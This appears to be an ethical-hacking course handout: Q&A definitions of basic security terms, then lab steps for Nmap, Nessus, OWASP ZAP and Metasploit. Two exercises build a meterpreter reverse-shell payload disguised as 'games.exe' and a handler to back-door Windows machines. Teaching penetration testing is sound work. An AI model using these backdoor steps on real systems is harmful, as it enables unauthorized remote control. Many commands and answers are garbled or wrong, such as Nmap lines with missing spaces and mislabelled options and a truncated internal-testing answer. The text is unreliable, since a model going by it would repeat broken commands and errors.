Short Question for Written
What is Hacking?
hacking means gaining access to someone's computer, mobile phone or any electronic device
to steal private data forcefully without the user's permission.
What is an Ethical Hacker?
An Ethical Hacker, also known as a White Hat Hacker, is a security expert who uses their skills
and knowledge to identify vulnerabilities in computer systems, networks, and applications
What is Firewall?
A firewall is a network security system that monitors and controls incoming and outgoing
network traffic based on predetermined security rules. Firewalls are the first line of defence for
your network security Firewall may be both Hardware and Software.
What is DNS?
DNS means Domain Name System, DNS allows users to access websites using domain names
and URLs rather than complex numerical internet protocol (IP) addresses. DNS translates
domain names to IP addresses so browsers can load Internet resources.
What is a Cyber Attack?
A cyber attack is an assault launched by cybercriminals using one or more computers against a
single or multiple computers or networks with the intention of stealing sensitive company
information or personal data, and generating profit.
What are the types of cyber-attacks?
Brute Force Attacks
Cross-Site Scripting (XSS)
Malware Attacks
Denial-of-Service (DoS)
Phishing Attacks
Social Engineering Attacks
Man-in-the-Middle (MitM) Attacks
Spoofing Attacks
SQL Injection Attacks
What is the primary goal of Penetration Testing?
The primary goal of Penetration Testing is to:
Uncover vulnerabilities and exploit them
• Identify vulnerabilities in a network and remediate them before a threat actor can find
•
and exploit them
validate the effectiveness of current security controls
Identify vulnerabilities within a system or network, and provide a detailed analysis of
security gaps and recommend measures to mitigate them
Protect the business and customers from cyber threats
What is different between Internet, Intranet and Extranet?
Internet: Public network accessible to anyone with an internet connection. The Internet is a
huge network of millions of computers and related devices from all corners of the globe
through which users are able to communicate.
Intranet: An Intranet is a local area network that has been designed for use within an
organization by its employees to share information as well as work together in Private network.
Intranet is Restricted to a specific organization or company
Extranet: An Extranet is an extended form of an Intranet that enables secure communication
and collaboration between an organization and external entities, such as suppliers, partners, or
clients.
What is 127.0.0.1 and localhost?
127.0.0.1: The IP Address
127.0.0.1 is a specific IP address, part of the reserved range 127.0.0.0/8, designated for
loopback purposes
localhost: The Hostname
Localhost is a hostname that resolves to the IP address of 127.0.0.1
127.0.0.1 is a specific IP address, and localhost is a hostname that resolves to that IP address.
What are the three types of penetration-testing methodologies?
Black Box: This methodology involves no prior knowledge of the target system's architecture,
infrastructure, or code.
Gray Box: This methodology involves partial knowledge of the target system's architecture,
infrastructure, or code.
White Box: This methodology involves complete knowledge of the target system's architecture,
infrastructure, and code.
What are the challenges of Penetration Testing?
False Positives
Continuously changing environments
Lack of a Test Environment
Limited Test Accounts
Limiting the Scope
Addressing Lack of Standardization and Transparency
Overemphasis on Compliance in Penetration Testing
Supporting Remediation Activities Post-Penetration Testing
What are the types of Penetration Testing?
Network Penetration Testing
Web Application Penetration Testing
Wireless Penetration Testing
Internal Penetration Testing
External Penetration Testing
Mobile Application Penetration Testing
Cloud Penetration Testing
Social Engineering Penetration Testing
What is session hijacking?
Session hijacking is a type of cyber-attack where an attacker steals or manipulates a user's
session token to gain unauthorized access to their information or service.
What is the difference between internal and external Penetration Testing?
Internal Penetration Testing:
3
External Penetration Testing:
Simulates a remote attack, mimicking the most prevalent method of hacking a company's
systems from the outside.
How to secure a web server step by step?
Use Strong and Unique Passwords:
Regular Security Updates
Intrusion Detection and Prevention
Restrict access to the server
Implement Web Application Firewall (WAF)
Monitor Server Logs
Regular Security Audits
What is NIC?
Network Interface Card (NIC) is a hardware component that enables computers to
communicate with other devices on a network. It provides a dedicated connection to a
network, allowing data transfer between devices.
What is CIA tried?
The CIA triad refers to confidentiality, integrity and availability, is a widely used information
security model for guiding an organization's efforts and policies aimed at keeping its
data secure.
Confidentiality: Only authorized users and processes should be able to access or modify data
Integrity: Data should be maintained in a correct state and nobody should be able to improperly
modify it, either accidentally or maliciously
Availability: Authorized users should be able to access data whenever they need to do so
Explain TCP Three-way handshake?
The TCP 3-Way Handshake is a fundamental process that establishes a reliable connection
between two devices over a TCP/IP network. The exchange of these four flags is performed in
three steps-SYN, SYN-ACK, and ACK
What are TCP and UDP? Difference between TCP UDP.
TCP refers to the Transmission Control Protocol. It is a connection-oriented protocol that means
it establishes the connection prior to the communication that occurs between the computing
devices in a network. This performs a 3 way hand shake to establish a secure and reliable
connection to start data transfer.
UDP refers to User Datagram Protocol. Unreliable, not connection oriented protocol.
Prior communications are not required in order to set up communication channels or data paths.
Specially focuses on reducing latency.
Comparison:
TCP Highly reliable, UDP not
TCP is slower compare to UDP
TCP ensures lossless communication using error detection, data loss may occur in UDP
TCP is bad live streaming as it require high speed with low latency, UDP overcomes this.
What is powershell?
It's a command line shell and scripting language developed by Microsoft mostly used for
administration, automation and configuration management.
PowerShell is a command-line shell and scripting language developed by Microsoft for
managing computers, automating tasks, and administering systems. It's much more powerful
than the traditional Windows Command Prompt (CMD).
Practical Part
Exercise 1: Gathering Whois and DNS Information
Lab Duration: 30 Minutes
Lab Objectives
The objective of this lab is to help students to analyze domain registered information and DNS
Information
Launch Web Browser
or
•
•
Task 1: go to: www.domainbigdata.com/whoxy.com
Task 2: Type www.megacorpone.com in search options.
Task 3: It will show the whois information about domain registered.
Task 4: go to https://intodns.com
Task 5: type www.megacorpone.com in search options
Task 6: Click Report
Task 7: It will show all DNS information
Launch Web Browser
Task 1: go to: https://who.is
Task 2: Type www.megacorpone.com in search options.
Task 3: It will show the whois information about domain registered.
Task 4: go to https://intodns.com
Task 5: type www.megacorpone.com in search options
Task 6: Click Report
Task 7: It will show all DNS information
Exercise 2: Understanding Network Scanning using Nmap
Lab Duration: 40 Minutes
Lab Objectives
The Objective of this lab is to help student learn how to scan network, Ip, Domain and analyze
the host.
Open Kali Linux OS
Login with Username: kali and Password: kali
Open Terminal
•
•
•
type: nmap -sP 192.168.1.0/24 (Ping Sweep Scan)
type: nmap -sn -PR 192.168.1.0 (ARP Ping Scan)
Type: nmap 192.168.1.0-0 (Remote OS Detection)
type: nmap 192.168.1.0-p-65535 (App Port Scan)
type: nmap 192.168.1.1-T5 (Insane speeds scan)
type: nmap -n -Pn -p 80--open -sV-vvv --script banner, http-title -iR 1000 (Fast search
for random web servers)
type: nmap 192.168.1.0-p-65535 (App Port Scan)
type: nmap -sn -PE 192.168.0 (Echo Ping Scan)
type: nmap 192.168.1.1 -sU (UDP port scan)
type: nmap -Pn--script http-sitemap-generator scanme.nmap.org (http site map
generator)
type: nmap 192.168.1.1-A (Enables OS detection)
type: nmap 192.168.1.1 -p 21 (Port scan for port 21)
type: nmap -Pn--script dns-brute domain.com (Brute forces DNS hostnames guessing
subdomains)
Exercise 3: Overview of Vulnerability Scanning
Lab Duration: 50 Minutes
Lab Objectives
The objective of this lab is to find possible network vulnerabilities.
https://localhost:8834 in the address bar. Enter login credential.
Username: admin
Password: admin
● After successful login, go to Nessus Policies window and click Create a new
● policy link.
● Click Create a New Scan link to create a new scan.
● Select Scan Types any one
● Set a name for the scan in the Name Text field type a description for the
● scan in the Description field, leave the Folder field set to default in the
● Targets text field (here, 162.241.216.11).
● click on the Save drop-down menu and click Launch.
● It will take sometimes to scan the machine
● Once the scan is completed, it will display a tick mark in right corner.
● Click Name (host name). to view the scan result.
● Click on IP/Host to view all the vulnerabilities associated with it.
● A list of vulnerabilities is displayed for this host as shown
● Click Export and select a format (here, HTML) in order to export the result
● The Export as HTML pop-up appears,
Exercise 4: Perform OS Discovery
Use the Unicornscan tool to perform OS Discovery on the target system
open terminal
type: unicorn ip –lv or Use unicornscan -v -I 10.10.0.4 and wait
it will show the TCP port with TTL Value
If not working upper command: Others way te ber kora.
Nmap –O ip
or
Ping –c5 ip
Exercise 5: Perform Static Malware Analysis
Create Payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali ip lport=4444 -f exe -o games.exe
Malware Analysis with Virus total
goto virustotal.com
upload exe file
it will show the basic properties, history,names,pe info, section, metadata etc.
click the relation tab. Exercise 6: Detect Web Application Vulnerabilities using OWASP ZAP
Click automated scan
Enter the website link http://testphp.vulnweb.com
After scan completes, alerts tab appears
Exercise 7: Create Backdoor to access windows OS.
Create Payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali ip Iport=4444 -f exe -o games.exe
msfconsole
•use exploit/multi/handler
•set PAYLOAD windows/meterpreter/reverse_tcp
•set LHOST ip
•set LPORT portnumber
•show options
⚫exploit
Exercise 8: Metasploit Framework
Lab Duration: 40 Minutes
Lab Objectives:
Open Kali Linux OS
Login with Username: root and Password: toor
Open Terminal
msfconsole -h
msfconsole
(you will go to msf terminal)
help
search android
search windows
use auxiliary/scanner/http/crawler
set RHOST IP
set RPORT 9000
run